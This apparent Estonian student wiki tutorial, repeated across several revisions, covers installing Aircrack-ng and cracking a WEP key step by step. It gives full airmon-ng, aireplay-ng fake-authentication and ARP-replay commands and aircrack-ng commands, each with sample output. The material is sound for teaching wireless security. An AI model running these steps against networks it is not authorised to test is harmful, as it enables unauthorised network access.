<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:31:50Z

Ktragel: /* WEP võtme murdmine */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:26:43Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:25:17Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
